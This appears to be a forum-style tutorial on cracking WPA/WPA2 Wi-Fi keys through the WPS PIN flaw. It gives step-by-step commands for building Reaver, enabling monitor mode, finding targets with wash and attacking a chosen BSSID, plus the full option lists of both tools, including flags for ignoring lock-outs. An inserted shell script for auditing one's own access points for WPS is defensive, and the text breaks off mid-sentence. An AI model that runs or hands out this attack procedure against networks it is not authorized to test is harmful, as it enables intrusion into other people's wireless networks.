
Backtrack Reaver Tutorial

The document provides instructions for using the Reaver tool to crack WPA/WPA2 passwords on wireless networks that are vulnerable to the WPS PIN attack method. It explains how to install Reaver, use wash to find vulnerable networks, and run Reaver against a target access point by specifying its BSSID and channel.

Reaver Tutorial [wpa/wpa2]

* You can download Reaver here: http://code.google.com/p/reaver-wps/downloads/list

Or type in the terminal:
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

Then we extract it:
tar -xvf reaver-1.4.tar.gz

We enter the folder:
cd reaver-1.4/src

Then we install it with:
./configure
make
make install

And that's it, we now have it installed.

Now to check for vulnerable networks

* We put our card into monitor mode:
airmon-ng start wlan0

* To search for vulnerable networks, we type:
wash -i mon0

wash syntax:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
    -i, --interface=<iface>              Interface to capture packets on
    -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
    -c, --channel=<num>                  Channel to listen on [auto]
    -o, --out-file=<file>                Write data to file
    -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
    -D, --daemonize                      Daemonize wash
    -C, --ignore-fcs                     Ignore frame checksum errors
    -5, --5ghz                           Use 5GHz 802.11 channels
    -s, --scan                           Use scan mode
    -u, --survey                         Use survey mode [default]
    -h, --help                           Show help

Example:
    wash -i mon0

* We note down the Wi-Fi details, such as the access point (B4:5D:3F:XX:XX:XX) and channel,

and then we run reaver.
Example usage:
reaver -i mon0 -b 00:1D:CE:6F:XX:XX -vv

Reaver syntax:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
    -i, --interface=<wlan>          Name of the monitor-mode interface to use
    -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, --mac=<mac>                 MAC of the host system
    -e, --essid=<ssid>              ESSID of the target AP
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -o, --out-file=<file>           Send output to a log file [stdout]
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -D, --daemonize                 Daemonize reaver
    -a, --auto                      Auto detect the best advanced options for the target AP
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv for more)
    -q, --quiet                     Only display critical messages
    -h, --help                      Show help

Advanced Options:
    -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    -d, --delay=<seconds>           Set the delay between pin attempts [1]
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [5]
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received
    -S, --dh-small                  Use small DH keys to improve crack speed
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -n, --nack                      Target AP always sends a NACK [Auto]
    -w, --win7                      Mimic a Windows 7 registrar [False]

Example:
    reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
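
The defensive counterpart of the wash scan step above, as an added example that is not part of the original tutorial or of the Reaver project: a shell function that checks a saved wash scan against an inventory of access points you administer and reports which of them still advertise WPS, and whether they report the locked state. The column layout (BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID), the sample scan, the inventory and all function names are assumptions constructed for the example.

```shell
# Added example: audit your own APs for advertised WPS using saved wash output.
# Assumed wash columns: BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID.

sample_scan() {   # constructed sample scan, not real networks
cat <<'EOF'
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
------------------------------------------------------------------------------------------
02:00:00:AA:00:01       1            -48        1.0               No                office-main
02:00:00:AA:00:02       6            -61        1.0               Yes               office guest
02:00:00:BB:00:09       11           -70        1.0               No                neighbour
EOF
}

owned_bssids() {  # constructed inventory of APs we administer
cat <<'EOF'
02:00:00:aa:00:01
02:00:00:aa:00:02
02:00:00:aa:00:03
EOF
}

# audit_wps INVENTORY_FILE SCAN_FILE -> one line per owned AP: BSSID|status|ESSID
#   WPS_OPEN = advertises WPS, not locked; WPS_LOCKED = AP reports locked state;
#   NOT_SEEN = no WPS advertisement from this AP in the scan
audit_wps() {
    awk '
        NR == FNR { if ($1 != "") own[toupper($1)] = 1; next }
        length($1) != 17 || $1 !~ /^[0-9A-Fa-f:]+$/ { next }  # header, rule
        {
            b = toupper($1)
            if (!(b in own)) next            # not ours: ignore
            essid = $6
            for (i = 7; i <= NF; i++) essid = essid " " $i
            status = (tolower($5) == "yes") ? "WPS_LOCKED" : "WPS_OPEN"
            seen[b] = 1
            print b "|" status "|" essid
        }
        END { for (k in own) if (!(k in seen)) print k "|NOT_SEEN|" }
    ' "$1" "$2" | sort
}

audit_sample() {  # run the audit over the constructed data above
    inv=$(mktemp); scan=$(mktemp)
    owned_bssids > "$inv"; sample_scan > "$scan"
    audit_wps "$inv" "$scan"
    rm -f "$inv" "$scan"
}
audit_sample
```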

In my case, it has taken me anywhere from three hours up to 98 hours to recover the WPA key.
Here I leave you some